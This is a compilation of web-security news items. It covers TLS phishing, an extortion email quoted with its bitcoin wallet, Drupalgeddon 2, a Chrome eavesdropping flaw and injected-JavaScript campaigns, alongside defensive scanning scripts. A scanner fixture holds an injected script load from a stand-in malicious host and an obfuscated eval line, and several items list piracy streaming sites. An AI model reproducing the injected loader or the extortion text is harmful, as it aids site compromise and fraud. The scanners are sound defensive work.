One person tweeted: ‘Cloudflare, possibly the largest internet/networking company in the world doesn’t have any kind of automated visibility on downtimes. does that not concern anyone?’ ‘Half their network is down and their status page says “all systems OK!”’ they claimed.

The outage appears to have started in the past hour. Unable to check Down Detector for updates, people took to Twitter in a quest for answers. ‘Sure is great that when Cloudflare goes down it takes half the Internet with it,’ one person wrote. Another roared: ‘Typical illustration of how bad the internet is centralized nowadays: Cloudflare is down, most websites & services being disrupted by this.’

The outage caused problems with the cryptocurrency website Coindesk, which tweeted: ‘Due to a Cloudflare outage, we’re getting bad data from our providers, which is showing incorrect crypto prices. Calm down everyone, Bitcoin is not $26.’

The outage appears to have been resolved now. Prince added: ‘Appear to have mitigated the issue causing the outage. Traffic restored. Working now to restore all services globally. More details to come as we have them.’

Source
  8. Criminals are using TLS certificates to convince users that fraudulent sites are worthy of their trust.

One of the most common mechanisms used to secure web browser sessions — and to assure consumers that their transactions are secure — is also being used by criminals looking to gain victims' trust in phishing campaigns. The FBI has issued a public service announcement defining the problem and urging individuals to go beyond simply trusting any "https" URL.

Browser publishers and website owners have waged successful campaigns to convince consumers to look for lock icons and the "https:" prefix as indicators that a website is encrypted and, therefore, secure. The problem, according to the FBI and security experts, is that many individuals incorrectly assume that an encrypted site is secure from every sort of security issue.

Craig Young, computer security researcher for Tripwire's VERT (vulnerability and exposure research team), recognizes the conflict between wanting consumers to feel secure and guarding against dangerous over-confidence. "Over the years, there has been a battle of words around how to communicate online security. Website security can be discussed at a number of levels with greatly different implications," he says. "On its own, however, the padlock does not actually confirm that the user is actually connected with a server from the business they expect," Young explains. "Unfortunately, there is still no solid solution for empowering the general public to discern phishing or scam sites with 100% effectiveness."

In the FBI's PSA, the bureau points out that criminals are increasingly incorporating website certificates in phishing email messages impersonating known companies and individuals. The trustworthy-looking URLs take the victims to pages that seek sensitive and personal information.

"This isn't new; cyber criminals have been orchestrating these kinds of phishing campaigns for several years," says Kevin Bocek, vice president of security strategy and threat intelligence at Venafi. He explains, "In 2017, security researchers uncovered over 15,000 certificates containing the word 'PayPal' that were being used in attacks. Since then it's become clear that bad actors have an entire supply chain in place on the dark web to get trustworthy TLS certificates to use in all kinds of malicious attacks."

Bocek says that researchers have found definitive evidence of TLS certificates for sale on the dark web, with prices for highly trustworthy certificates reaching more than a thousand dollars. He sees greater visibility and transparency as key assets in fighting the proliferation of these "trustworthy" certificates used in fraudulent ways.

Other technologies may eventually provide additional weapons against the criminals. Young says, "In the long run, the best available solution to this problem is probably the use of newer standards like WebAuthN to prevent naïve users from inadvertently divulging site credentials to a phisher."

The FBI's PSA doesn't recommend new technology, instead suggesting behavioral defenses against the phishing attacks. The Bureau recommends questioning the intent of email messages, confirming the authenticity of messages before divulging sensitive information, looking for mis-spellings or domain inconsistencies, and tempering the overall trust in a site simply because it displays a green lock icon.

Source
  9. A new extortion scam campaign is underway that is targeting website owners and stating that if they do not make a payment, the attacker will ruin their site's reputation and get them blacklisted for spam.

We all know, or should know, about the sextortion emails people are receiving, where the sender states they have hacked the recipient's computer and taped them doing things while on adult sites. Since then, further extortion scams were created that pretend to be from the CIA, make bomb threats, and even come from hitmen asking you to pay them to call off their hit.

In this new variant, scammers are utilizing a website's contact form to send messages to site owners with the subject "Abuse and lifetime blocking of the site - example.com. My requirements". The demands state that the sender will destroy the reputation of the site if a 0.3 bitcoin (approximately $2,400) payment is not made to them.

Extortion Email

If a payment is not made, the extortionist states that they will send millions of emails from your domain, leave nasty reviews about the recipient's site, and submit nasty messages to other people's contact forms pretending to be from your domain, all of it done to ruin the reputation of the site.

The extortion email says:

Hey. Soon your hosting account and your domain xxx.nl will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.

Here is a list of what you get if you don’t follow my requirements:
+ abuse spamhouse for aggressive web spam
+ tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam
+ lifetime blocking of your hosting account for aggressive web and email spam
+ lifetime blocking of your domain for aggressive web and email spam
+ Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam
+ complete destruction of your reputation and loss of clients forever
+ for a full recovery from the damage you need tens of thousands of dollars

Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.3 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

How do I do all this to get this result:
1. I will send 30 messages to 13 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you are the spammer and insult people. And everyone will not care that it is not you.
2. I’ll send 300 messages to 9,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address xxx.nl and your contact details. And then send out abusive messages with the address of your site.
3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315900 sites from which you will definitely get a huge amount of abuse) of your site xxx.nl.

After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently.

Receiving an email like this is scary, especially when someone threatens your website, which may be your livelihood. With that said, it is important to understand that this attacker is sending these to many sites, that it is just a scam, and that they are not going to take the effort to ruin your site's reputation. If you receive one of these emails, simply mark it as spam or delete it.

Source
  10. Over 80 government websites are down after TLS certificates expired and there's nobody on hand to renew them.

More than 80 TLS certificates used by US government websites have expired so far without being renewed, leaving some websites inaccessible to the public. NASA, the US Department of Justice, and the Court of Appeals are just some of the US government agencies currently impacted, according to Netcraft.

The blame falls on the current US federal government shutdown, caused by US President Donald Trump's refusal to sign any 2019 government budget bill that doesn't contain funding for a Mexico border wall he promised during his election campaign. This has resulted in hundreds of thousands of government workers being furloughed across all government agencies, including staff handling IT support and cybersecurity. As a result, government websites are dropping like flies, with no one on hand to renew TLS certificates.

Websites with expired certificates where admins followed proper procedures and implemented correctly-functioning HSTS (HTTP Strict Transport Security) policies are down for good, and users can't access these portals, not even to browse for basic information. Government websites with expired TLS certificates but which didn't implement HSTS show an HTTPS error in users' browsers, but this error can be bypassed to access the site via HTTP. Nevertheless, visitors are warned not to log in or perform any sensitive operations on these sites, as traffic and authentication credentials aren't encrypted and could be intercepted by threat actors. Visiting and browsing content is fine, but users should also be aware that these websites will not be actively managed and there won't be employees on hand to process requests or update sites with the latest correct information.

The current government shutdown has been a disaster on the cybersecurity front so far. Experts from multiple cyber-security firms have warned that this would be the perfect time for hostile countries to carry out cyber-attacks against the US government, as agencies are understaffed and IT infrastructure is left largely unattended.

According to Axios, the Department of Homeland Security's newly created Cybersecurity and Infrastructure Security Agency (CISA) has had 43 percent of its staff, which amounts to roughly 1,500 employees, sent home. The National Institute of Standards and Technology, which puts together and manages many security standards, has also kept only 49 employees of its normal 3,000.

But besides the losses in current personnel, government agencies have also missed an important opportunity for recruiting new cyber-security talent this winter, according to CyberScoop. No representatives for the FTC, NIST, the State Department, or CISA were present at booths at an important cyber-related student recruiting event held in Washington this year.

In the end, nothing good will come out of this shutdown. Whether it is a cyber-attack that goes undetected or agencies losing cyber-security personnel to the private sector, the ripple effects of this shutdown will haunt agencies for months or years to come.

Source
  11. The internet is an amazing place where you can find more than 1 billion websites. Along with some fantastic sites there are some weird ones too. It's impossible for a person to visit every website, so we have gathered some strange websites on the internet. Some of them are funny, some are really boring and a few are such that you can't answer why they exist. We haven't included adult sites here, so you can click on all the links without any hesitation. Enjoy the list!

1. Iloveyoulikeafatladylovesapples: Feel the hunger of the fat lady until you let her eat enough apples. The website is completely useless, but you can still enjoy the graphics and background music.
2. Thenicestplaceontheinter.net: The really sweet website that offers free hugs. Go get it.
3. SciencevsMagic.net/Tes: You can mix the words amazing and weird to describe this one. Also, the website gave AIDS to my eyes.
4. Michaeljfoxnews: Feel the earthquake on your computer.
5. Pointerpointer: I don't know where they found these pictures, but this is how you get to the specific point.
6. Heeeeeeeey: Just click on the link and get the heeey hooo party feel.
7. wwwdotcom: A serious tip for you.
8. Rainymood: Rain makes everything better. So just sit back and enjoy the sound effect to lighten your mood.
9. Isitchristmas: The name says it all. Maybe the website has been designed for people suffering from short-term memory loss.
10. Cat-bounce: And that's how humans play with the emotions of cats.
11. 111111111111111111111111111111111111111111111111111111111111: Believe me, I have no idea what the exact purpose of the website is. But it seems like the website owner is not really a fan of Arnold Schwarzenegger.
12. Heyyeyaaeyaaaeyaeyaa: Catchy music with special cartoon characters for our special readers.
13. Thisman: This is the height of weirdness! The website says that hundreds of people dream about this face. No, I don't.
14. Breakglasstosoundalarm: The thing you wanted to do once in your life is here.
15. Internetlivestats: I don't think this is live data, however you will get an idea of a few internet stats.
16. Simonpanrucker: No words to explain this useless thing. Kindly decide for yourself how weird it is.
17. Ilooklikebarackobama: You might want to reply to this website, "No you don't, not even a bit".
18. Corgiorgy: The cute dog army.
19. Haneke: If you like complicated things and pay a lot of attention to details, you won't regret visiting this website.
20. Fearthegaychicken: The question is what makes you think that this chicken is gay. Is it the background color or the sound?
21. Koalastothemax: Amazing creativity and fun with pixels.
22. Procatinator: Cats' popularity is increasing day by day, and somehow this website is the reason behind it.
23. Youfellasleepwatchingadvd: If your mom doesn't allow you to watch TV, you could spend some time here.
24. Essaytyper: This is the place where you become a professional typist in no time.
25. Feedthehead: My advice is, don't just feed the head, play with the whole face.
26. Nooooooooooooooo: If your boss gives you extra workload, you can reply with this link.
27. Zoomquilt: The weirdness tends to infinity. Even a telescope can't look so far.
28. Staggeringbeauty: Just shake the mouse and see the snake's reaction.
29. Anasomnia: This is how dreams become nightmares.
30. Eelslap: Slap as tight as many times as you want. He won't mind.

Source
  12. TV and Sport events
http://www.rojadirecta.me/
http://88.80.11.29/
http://www.streamhunter.eu
http://zonytvcom.info/
http://www.livestation.com/ (News Channels)
https://www.youtube.com/live/all
http://www.justin.tv/
http://www.ustream.tv
http://aflam4you.tv/index.html (Arabic Channels + beIN Sports channels)
http://www.kakibara.com/
http://www.stream2watch.me/
http://www.hahasport.com/
http://www.firstrow1.eu/
http://tvtoss.com/

Movies
http://www.movie4k.to/

Movies Subtitles
http://subscene.com/

Football highlights
http://footyroom.com/

Updated: Download Music:
http://beemp3.com
http://mp3lx.com/
http://mp3skull.com/
http://www.mp3toss.com

Updated 2: Watch TV on Android
1- Download IPTV App from Playstore
2- Download TV playlists and add them to the App. Here is a good website for the playlists
NB: You can try another app called Kodi; it's available for Windows too, but I have not tried it yet.

Updated 3:
http://www.streamgaroo.com/
  13. Open .git directories are a bigger cybersecurity problem than many might imagine, at least according to a Czech security researcher who discovered almost 400,000 web pages with an open .git directory, possibly exposing a wide variety of data.

Vladimír Smitka began his .git directory odyssey in July, when he began looking at Czech websites to find how many were improperly configured and allowed access to the .git folder of their version control repository. Open .git directories are a particularly dangerous issue, he said, because they can contain a great deal of sensitive information.

"Information about the website's structure, and sometimes you can get very sensitive data such as database passwords, API keys, development IDE settings, and so on. However, this data shouldn't be stored in the repository, but in previous scans of various security issues, I have found many developers that do not follow these best practices," Smitka wrote.

Smitka queried 230 million websites to discover the 390,000 allowing access to their .git directories. The vast majority of the websites with open directories had a .com TLD, with .net, .de, .org and .uk comprising most of the others.

What tends to happen is that developers leave the .git folder in a publicly accessible portion of their site, and when they go to verify whether or not the folder is protected, many are fooled when they request <web-site>/.git/ and receive an Error 403 message. Smitka noted that this might make it appear as if the folder is inaccessible, but in fact the error message is a false positive. "Actually, the 403 error is caused by the missing index.html or index.php and disabled autoindex functionality. However, access to the files is still possible," he said, adding that the files can possibly even be viewable on Google. Instead, he recommends checking <web-site>/.git/HEAD to ensure the folder is secure.

During his scanning process he was able to find 290,000 email addresses in the directories, so he set about trying to warn as many people as possible about their website's vulnerabilities. He boiled the initial list down to about 90,000 addresses by eliminating machine addresses and those associated with multiple domains. In the end, 18,000 were kicked back as undeliverable.

"After sending the emails, I exchanged about 300 additional messages with affected parties to clarify the issue. I have received almost 2,000 thank-you emails, 30 false positives, 2 scammer/spammer accusations, and 1 threat to call the Canadian police," Smitka said. The emails contain a link to a page Smitka created that explained the problem and contained a mitigation for it.

Source
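The /.git/HEAD check Smitka recommends, written up as an added Python example for site owners verifying their own site; it is not Smitka's scanner, the sample responses are constructed, and only probe_own_site() talks to a network:

```python
"""Added example, not Smitka's tooling: an owner-side check for an exposed
.git directory that follows the advice above. A 403 on /.git/ proves
nothing (it usually just means directory listing is off), so the check
fetches /.git/HEAD and, to avoid the false positives that catch-all pages
cause, accepts only a body that really looks like a git HEAD file. The
sample responses are constructed; probe_own_site() does live requests."""
import re
import urllib.error
import urllib.request

# A HEAD file is either "ref: refs/heads/<branch>" or a bare 40-hex commit id.
HEAD_PATTERNS = (
    re.compile(rb"\Aref: refs/[\w./-]+\s*\Z"),
    re.compile(rb"\A[0-9a-f]{40}\s*\Z"),
)


def looks_like_git_head(body: bytes) -> bool:
    """True when body has the exact shape git writes to .git/HEAD."""
    return any(p.match(body) for p in HEAD_PATTERNS)


def assess_git_exposure(responses):
    """responses maps a path to (status, body) as the site answered it.
    Returns (exposed, reason). Only /.git/HEAD decides; /.git/ is reported
    for context because a 403 there is the classic false reassurance."""
    status, body = responses.get("/.git/HEAD", (None, b""))
    listing_status = responses.get("/.git/", (None, b""))[0]
    if status == 200 and looks_like_git_head(body):
        note = (" (/.git/ returned 403, which hid the problem)"
                if listing_status == 403 else "")
        return True, "/.git/HEAD is readable" + note
    if status == 200:
        return False, ("/.git/HEAD returned 200 but not a HEAD file: "
                       "catch-all page, not a repository")
    if status is None:
        return False, "/.git/HEAD was not fetched"
    return False, f"/.git/HEAD returned {status}"


def probe_own_site(base_url: str, timeout: float = 5.0):
    """Fetch the two paths from a site you administer and return the
    responses dict expected by assess_git_exposure()."""
    responses = {}
    for path in ("/.git/", "/.git/HEAD"):
        req = urllib.request.Request(
            base_url.rstrip("/") + path,
            headers={"User-Agent": "git-exposure-selfcheck"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                responses[path] = (resp.status, resp.read(1024))
        except urllib.error.HTTPError as err:
            responses[path] = (err.code, err.read(1024))
    return responses


# Constructed sample responses covering the cases discussed above.
SAMPLES = {
    "misconfigured": {"/.git/": (403, b"<h1>Forbidden</h1>"),
                      "/.git/HEAD": (200, b"ref: refs/heads/master\n")},
    "detached_head": {"/.git/": (403, b""),
                      "/.git/HEAD": (200, b"a" * 40 + b"\n")},
    "catch_all":     {"/.git/": (200, b"<html>Welcome</html>"),
                      "/.git/HEAD": (200, b"<html>Welcome</html>")},
    "blocked":       {"/.git/": (403, b""), "/.git/HEAD": (403, b"")},
}

if __name__ == "__main__":
    for name, responses in SAMPLES.items():
        print(f"{name:14s} ->", assess_git_exposure(responses))
```

The "catch_all" case is why a status code alone is not enough: a site that answers every path with its home page would otherwise be reported as exposed, which is one source of the false positives Smitka mentions.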
  14. Despite the fact that the Drupal exploit was reported, and patched, in March 2018, some 115,000 websites are still vulnerable.

An exploit found in the popular content management system (CMS) Drupal that makes it trivially easy for attackers to execute arbitrary code is still causing massive amounts of trouble three months after being discovered. As reported by researchers from Malwarebytes Labs, the attack known as Drupalgeddon 2 has infected over 900 websites with malware, primarily in the form of cryptominers that max out visitor CPUs in order to mine cryptocurrency.

While many infected websites simply appear to be test domains set up and abandoned on Amazon Web Services, many legitimate sites are infected, including high-profile pages operated by the Arkansas state government and the University of Southern California. A full list of infected websites can be found here, and anyone running an outdated version of Drupal should check to be sure they aren't listed.

Just because your website isn't listed doesn't mean its administrators are off the hook: security researcher Troy Mursch said that the number of vulnerable websites is greater than 115,000, leaving plenty of internet real estate left to infect.

The anatomy of a Drupal disaster

It makes sense that a remote code execution vulnerability would go unresolved for so long on a Drupal website, at least from the perspective of Jérôme Segura of Malwarebytes Labs. "Updating or upgrading Drupal may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production," Segura said in a Malwarebytes Labs blog post.

The frustration and extra work that come with a CMS upgrade are well known to anyone who works with one, so it makes sense that updates would be avoided until absolutely necessary. Unfortunately for those still running Drupal versions older than 7.5.9, this is one of those instances. Outdated versions of Drupal seem commonplace—Malwarebytes Labs even reported that 30% of those infected by Drupalgeddon 2 were running some version of Drupal 7.3, which was last updated in 2015.

As reported by TechRepublic when Drupalgeddon 2 was first revealed in March 2018, "The vulnerability relates to a conflict between how PHP handles arrays in parameters, and Drupal's use of the hash (#) at the beginning of array keys to signify special keys that typically result in further computation, leading to the ability to inject code arbitrarily." An attacker has no need to authenticate with Drupal to perform the exploit—they just have to visit a page with a maliciously crafted URL.

This isn't the first time that a widespread exploit has been successful due to the failure of IT to install needed security updates: perhaps the most well-known incident to happen due to similar causes was the GoldenEye/Petya outbreak in 2017. That's just a single example, and it isn't the only one. Ransomware proliferates largely due to unpatched systems, and the US Government even released a report saying that botnets are successful in part due to exploiting known vulnerabilities.

There's no excuse for this kind of attack: the vulnerability is known and its patch is available. Yes, installing it might be a headache and necessitate more work, but as has been stated before, taking the effort to patch now will prevent you from having to recover later. You can get the latest versions of Drupal here.

The big takeaways for tech leaders:
A three-month-old Drupal exploit has spread to over 900 websites, infecting them with cryptominers and other malware. A patch for the vulnerability has been available since March 2018.
Drupal administrators need to update to the latest version now to prevent becoming a victim of this "trivially easy" exploit.

Source
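The request-side mitigation for the "#"-key problem described above, as an added Python example; it is not Drupal's code (Drupal's patch strips such keys in PHP before the request reaches the application), the bracket-syntax parser is a minimal model of PHP's, and the sample request is constructed:

```python
"""Added example, not Drupal's own code: the shape of the Drupalgeddon 2
mitigation. Drupal's renderer treats array keys that begin with '#' as
control properties, and PHP's bracket syntax in a request (a[b][c]=v) let an
unauthenticated request smuggle such keys in; the fix strips '#'-prefixed
keys from the request before the application sees them. The query strings
below are constructed and the parser is a minimal model of PHP's."""
import re
from urllib.parse import unquote_plus

NAME_RE = re.compile(r"([^\[]+)((?:\[[^\]]*\])*)$")


def php_parse_qs(query: str) -> dict:
    """Expand PHP-style bracketed names into nested dicts; "[]" appends with
    the next numeric index, as PHP does."""
    root = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        match = NAME_RE.match(unquote_plus(name))
        if not match:
            continue  # malformed name; dropped rather than guessed at
        parts = [match.group(1)] + re.findall(r"\[([^\]]*)\]", match.group(2))
        node = root
        for i, part in enumerate(parts):
            if part == "":
                part = str(len(node))
            if i == len(parts) - 1:
                node[part] = unquote_plus(value)
            else:
                child = node.get(part)
                if not isinstance(child, dict):
                    child = node[part] = {}
                node = child
    return root


def sanitize_request(params: dict):
    """Return (clean copy, list of removed key paths). Every key starting
    with '#' is dropped at any depth, whatever its name, and the paths are
    returned so the attempt can be logged and alerted on."""
    removed = []

    def walk(value, path):
        if not isinstance(value, dict):
            return value
        clean = {}
        for key, child in value.items():
            child_path = f"{path}[{key}]" if path else str(key)
            if str(key).startswith("#"):
                removed.append(child_path)
                continue
            clean[key] = walk(child, child_path)
        return clean

    return walk(params, ""), removed


if __name__ == "__main__":
    # Constructed request: an ordinary form post with one smuggled '#' key.
    raw = ("name=alice&profile[%23injected]=payload&profile[nick]=ali"
           "&tags[]=a&tags[]=b")
    clean, removed = sanitize_request(php_parse_qs(raw))
    print("clean  :", clean)
    print("removed:", removed)  # ['profile[#injected]']
```

A non-empty "removed" list on a production request is worth an alert: legitimate browsers never send "#"-prefixed parameter names to Drupal.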
  15. Batu69

    Movie Downloading Websites

    When it comes to entertainment, nothing can beat the environment and fun provided by movies. There are millions of movies in different categories that you can choose as per your interest. From sci-fi to comedy, from action to suspense, from horror to romantic, everything is out there. You just need to find the right path to watch these movies. If your life is so busy and hectic that you don't get enough time to go out to movie halls and theaters to watch movies, you can still have the latest movies on your device so that you can watch them whenever you want. Today, I am sharing the best free Hollywood movie downloading websites where you can download the latest and old movies in high definition.

    1. My Download Tube
    My Download Tube is a free movie downloading website that provides the latest Hollywood and Bollywood movies and lets you download them for free. If you don't want to download a movie but want to watch it online, My Download Tube completes your wish and lets you watch them without any registration or sign-up. My Download Tube also provides a section for games where you can check games and download them for free. Or you can simply write your query as a movie or game name in the search box to watch exactly what you intend to.

    2. YouTube Movies
    YouTube Movies is one of the sites where you can find any video, any episode of a favorite TV series, movies, songs and lots more. You can use its search box tool to find the link to download a full movie. All the movies provided here are good in quality and have full length. You can download YouTube movies by installing Internet Download Manager, which will automatically prompt you to download movies.

    3. Gingle
    Gingle is another amazing online portal to download the latest movies; not just movies, but you can also search for music, listen to streaming online radio stations, play online games, get wallpapers and much more. If you are looking for anything specific, just request it on Gingle and the online portal will be delighted to add that. Gingle doesn't ask you for any registration or to create any account. You can find the stuff that you want to watch easily.

    15 Best Free Movie Downloading Websites Of 2016
  16. LeeSmithG

    [Emoticons] Help.

    Has anyone got a text document with the emoticons so I can copy and paste? I have searched and found nothing. You know :+) is :+d is :+( is So much appreciated.
  17. Just imagine, you are sitting in front of your laptop and your laptop is listening to your nearby conversations. What if the recorded audio from the system’s microphone is being instantly uploaded to a malicious website? Google has created a speech-recognition Application Programming Interface (API) that allows websites to interact with Google Chrome and the computer’s microphone, allowing you to speak instead of typing into any text box, to make hands-free web searches and quick conversions, and to use audio translators with them. In January, a flaw was discovered in Google Chrome that enabled malicious websites with speech recognition software to eavesdrop on users’ conversations from the background without their knowledge, using an outdated Google speech API.

CHROME IS LISTENING TO YOU

A new, similar vulnerability in Google Chrome has been discovered by Israeli security researcher Guy Aharonovsky, who claimed that Chrome’s speech-recognition API has a vulnerability that allows attackers to turn a victim's machine into a listening port without asking for any permission, even if your microphone is completely disabled. "Even blocking any access to the microphone under chrome://settings/content will not remedy this flaw," he said in a blog post.

The reported vulnerability exploits the “-x-webkit-speech” feature of Chrome’s speech-recognition API and allows a malicious web application to eavesdrop in the background without any indication to the user that their microphone is enabled. He has also published a proof-of-concept webpage and a video demonstration, designed to work on Chrome for the Mac operating system, but the exploit only works for Chrome, on any operating system. In the demonstration, he has used the HTML5 full-screen feature to hide the indication box.

“In Chrome all one needs in order to access the user’s speech is to use this line of HTML5 code: <input -x-webkit-speech="" /> that’s all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the ‘indication box’ telling him to “Speak now” but that can be pushed out of the screen and / or obfuscated.”

He has reported the flaw to Google via the Chromium bug tracker. They confirmed the existence of the vulnerability, but assigned it a 'low' severity level, which means Google will not offer any immediate fix for this flaw. Source
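A defender-side check for the post above: the legacy speech input is requested with a plain HTML attribute, so a site owner can audit their own templates for it. The scanner below is an added example, not code from the post or from the researcher's proof of concept; the sample page it scans is constructed here and the attribute spellings it looks for are the two forms the post itself mentions (with and without the leading dash).

```python
"""Audit HTML for elements that request Chrome's legacy x-webkit-speech input."""
from html.parser import HTMLParser

# Attribute spellings the post describes; Chrome lowercases attribute names,
# and so does html.parser, so a case-insensitive match is what we need.
SPEECH_ATTRS = {"x-webkit-speech", "-x-webkit-speech"}


class SpeechAttrScanner(HTMLParser):
    """Collects every element that carries a speech-input attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []  # dicts with keys: tag, attr, line

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower() in SPEECH_ATTRS:
                line, _col = self.getpos()  # 1-based line of the start tag
                self.findings.append({"tag": tag, "attr": name.lower(), "line": line})

    # Self-closing forms such as <input ... /> are reported the same way.
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def find_speech_inputs(html):
    """Return a list of findings for every element carrying a speech attribute."""
    scanner = SpeechAttrScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one ordinary input and two that request speech input.
SAMPLE_PAGE = "\n".join([
    "<html><body>",
    "<form>",
    '  <input type="text" name="q">',
    '  <input -x-webkit-speech="" name="voice">',
    '  <input x-webkit-speech name="voice2">',
    "</form>",
    "</body></html>",
])

if __name__ == "__main__":
    for hit in find_speech_inputs(SAMPLE_PAGE):
        print(f"line {hit['line']}: <{hit['tag']}> carries {hit['attr']}")
```

Run it over the site's templates (or crawled pages) and treat any hit as something to review: a legitimate form that wants voice input will have been written on purpose, while an unexpected hit in a page that should not be listening is worth investigating.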
  18. If you're interested in building your own website, or developing a web app or service for others to use, you'll need to get familiar with how the web works and the tools you'll need to develop for it. Mozilla's Webmaker project can help you learn, with fun, interactive activities and lesson plans designed for people of all skill levels.

Webmaker is actually a global project by the folks at Mozilla designed to teach people web literacy—that is, pull back the veil on how the web works and how your favorite sites and apps function, so you can learn to build for the web yourself. The general idea, according to Mozilla, is that there's no better way to learn the mechanics and culture of the web than by playing around and hacking it in a safe, fun environment. Webmaker has three major components—the Thimble interactive, collaborative code editor that demystifies HTML, CSS, and JavaScript, and corrects you as you write it (and shows you the results of what you write as you write it); X-Ray Goggles, which lets you view the source of any element on a web page—then change and tweak it to see what effect it would have on a real website; and Popcorn, an HTML5 media tool that shows you how to layer videos, images, audio embeds, and other rich media on web sites. The Thimble editor just picked up an educational award, and the whole project is designed to break from a simple curriculum of lessons (a la Codecademy and the like) and instead focus on getting hands-on with web design and development.

If you're interested, or thinking about building your own website or web apps, it's worth a look. Hit the link below for more information. Webmaker Source
  19. Threat researchers from Cisco have shared details on a new and rapidly spreading attack targeting web servers running on systems powered by outdated versions of Linux. According to Cisco, upward of 400 different hosts were affected each day on March 17 and 18, with attackers successfully compromising more than 2,700 URLs at the time of publishing. The attackers are compromising legitimate websites, Cisco said, with most of the affected web servers running on the Linux 2.6 kernel—an outdated version that was first released in 2003. The compromised servers have been found throughout the world, but with a particularly high concentration in Germany and the United States.

“It is possible that attackers have identified a vulnerability on the platform and been able to take advantage of the fact that these are older systems that may not be continuously patched by administrators,” Cisco’s Martin Lee wrote in a blog post late Thursday.

In order to execute the attack, cybercriminals compromise an existing website and insert a line of JavaScript into multiple .js files hosted on the site, causing visitors to load and execute a new JavaScript file served from a compromised third-party host. “We observed the second stage sites serving what appears to be pay per view fraud pages, where the visitor’s browser loads multiple advertisements to generate revenue for the attacker,” Lee said. “However, there is anecdotal evidence that visitors have been infected with Trojan malware as part of this final step.” Many of the affected hosts have been identified as compromised and cleaned, Cisco said. Lee explained that some security products may detect the JavaScript redirect as being similar to that previously used in the Blackhole exploit kit, but Cisco has no evidence suggesting that the attacks are related to Blackhole rather than being an example of code reuse.

“This large-scale compromise of an aging operating system highlights the risks posed by leaving such systems in operation,” Lee said. "Systems that are unmaintained or unsupported are no longer patched with security updates," he continued. "When attackers discover a vulnerability in the system, they can exploit it at their whim without fear of it being remedied. In April 2014, Windows XP will become unsupported. Organizations urgently need to review their use of unsupported systems in operation. Such systems need to be upgraded where possible, or regularly monitored to detect compromise."

Just yesterday, researchers from Imperva issued a threat advisory about an old PHP vulnerability that was patched in 2012 but is actively being exploited in attacks. While this particular PHP flaw was discovered in March 2012 and patched in May, a public exploit began making the rounds in October 2013, Imperva said in its advisory. Imperva's honeypots detected more than 30,000 campaigns using some form of the exploit within three weeks of its publication. The fact that the exploit became publicly available more than a year later suggests criminals were still enjoying some degree of success targeting this vulnerability, Barry Shteiman, director of security strategy at Imperva, told SecurityWeek.

“Large numbers of vulnerable unpatched systems on the Internet are tempting targets for attackers,” Cisco’s Lee said. “Such systems can be used as disposable one-shot platforms for launching attacks. This makes it all the more important that aging systems are properly maintained and protected.” Cisco has provided a list of compromised URLs here and here, which can be used for blacklisting and URL filtering in order to prevent users from visiting those pages.

Earlier this week, ESET warned of a widespread attack campaign that has infected more than 25,000 Linux and UNIX servers around the world. According to ESET, the servers are being hijacked by a backdoor Trojan as part of a campaign the researchers are calling 'Operation Windigo.' Once infected, victimized systems are leveraged to steal credentials, redirect web traffic to malicious sites and send as many as 35 million spam messages a day. Source
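For an administrator who wants to check their own web root for the kind of injection the post above describes (a line added to existing .js files that loads a script from a host the site does not control), the scanner below is an added example, not code from Cisco or from the post. It flags any line that uses a script-loading idiom and references a host outside an allowlist of the site's own domains, and separately flags decode-then-execute idioms that injected snippets commonly use. The allowlist, the sample file contents and the `.example` hostnames are all constructed for the example.

```python
"""Flag lines in site JavaScript that load a script from an untrusted host
or that use obfuscation idioms typical of injected redirect code."""
import os
import re

# Hostnames in absolute or protocol-relative ("//host/...") URLs.
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)
# Idioms that insert or load a script at run time.
LOADER_RE = re.compile(
    r"document\.write|createElement\s*\(\s*['\"]script|<script|\.src\s*=", re.I
)
# Decode-then-execute idioms common in injected, obfuscated snippets.
OBFUSCATION_RE = re.compile(r"eval\s*\(|unescape\s*\(|fromCharCode", re.I)


def scan_js_text(text, trusted_hosts, max_snippet=80):
    """Return a list of findings (line, reason, host, snippet) for one file's text."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        snippet = line.strip()[:max_snippet]
        if LOADER_RE.search(line):
            for host in HOST_RE.findall(line):
                if host.lower() not in trusted:
                    findings.append({"line": lineno, "reason": "external script load",
                                     "host": host.lower(), "snippet": snippet})
        if OBFUSCATION_RE.search(line):
            findings.append({"line": lineno, "reason": "obfuscation idiom",
                             "host": None, "snippet": snippet})
    return findings


def scan_directory(root, trusted_hosts):
    """Walk a web root and return {path: findings} for every .js file with hits."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_js_text(fh.read(), trusted_hosts)
                if hits:
                    results[path] = hits
    return results


# Constructed sample: the site's own hosts and a .js file with two injected lines.
TRUSTED_HOSTS = {"www.example.com", "cdn.example-partner.net"}
SAMPLE_JS = "\n".join([
    "// site.min.js (constructed sample, not a real library)",
    "(function(){var a=1;})();",
    "document.write('<script src=\"//cdn.example-partner.net/lib.js\"></script>');",
    "var s=document.createElement('script');s.src='http://cdn.bad-host.example/stat.js';"
    "document.body.appendChild(s);",
    "console.log('see http://www.example.com/help');",
    "eval(unescape('%76%61%72%20%78%3d%31'));",
])

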